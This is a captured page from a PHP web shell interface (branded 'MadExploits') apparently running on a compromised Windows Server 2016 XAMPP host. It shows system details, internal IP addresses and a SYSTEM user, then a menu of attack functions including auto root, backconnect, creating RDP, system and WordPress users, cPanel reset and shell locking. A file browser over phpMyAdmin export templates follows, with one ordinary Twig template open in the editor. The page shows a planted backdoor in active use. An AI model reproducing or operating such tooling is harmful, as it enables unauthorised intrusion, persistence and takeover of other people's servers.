Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
phpMyAdmin /
templates /
display /
export /
[ HOME SHELL ]
Name
Size
Permission
Action
format_dropdown.twig
105
B
-rw-rw-rw-
hidden_inputs.twig
792
B
-rw-rw-rw-
method.twig
888
B
-rw-rw-rw-
option_header.twig
459
B
-rw-rw-rw-
options_format.twig
949
B
-rw-rw-rw-
options_output.twig
1.91
KB
-rw-rw-rw-
options_output_charset.twig
529
B
-rw-rw-rw-
options_output_compression.twi...
842
B
-rw-rw-rw-
options_output_format.twig
494
B
-rw-rw-rw-
options_output_radio.twig
257
B
-rw-rw-rw-
options_output_save_dir.twig
592
B
-rw-rw-rw-
options_output_separate_files....
454
B
-rw-rw-rw-
options_quick_export.twig
876
B
-rw-rw-rw-
options_rows.twig
1.63
KB
-rw-rw-rw-
select_options.twig
636
B
-rw-rw-rw-
selection.twig
324
B
-rw-rw-rw-
template_loading.twig
1.27
KB
-rw-rw-rw-
template_options.twig
243
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : options_rows.twig
<div class="exportoptions" id="rows"> <h3>{% trans 'Rows:' %}</h3> <ul> <li> <input type="radio" name="allrows" value="0" id="radio_allrows_0" {{- allrows is not null and allrows == 0 ? ' checked' }}> <label for="radio_allrows_0">{% trans 'Dump some row(s)' %}</label> <ul> <li> <label for="limit_to">{% trans 'Number of rows:' %}</label> <input type="text" id="limit_to" name="limit_to" size="5" value=" {# Keep everything space less because it is a value #} {%- if limit_to is not null -%} {{- limit_to -}} {%- elseif unlim_num_rows is not empty and unlim_num_rows != 0 -%} {{- unlim_num_rows -}} {%- else %} {{- number_of_rows -}} {%- endif -%}" onfocus="this.select()"> </li> <li> <label for="limit_from">{% trans 'Row to begin at:' %}</label> <input type="text" id="limit_from" name="limit_from" size="5" value=" {{- limit_from is not null ? limit_from : 0 }}" onfocus="this.select()"> </li> </ul> </li> <li> <input type="radio" name="allrows" value="1" id="radio_allrows_1" {{- allrows is null or allrows == 1 ? ' checked' }}> <label for="radio_allrows_1">{% trans 'Dump all rows' %}</label> </li> </ul> </div>
Close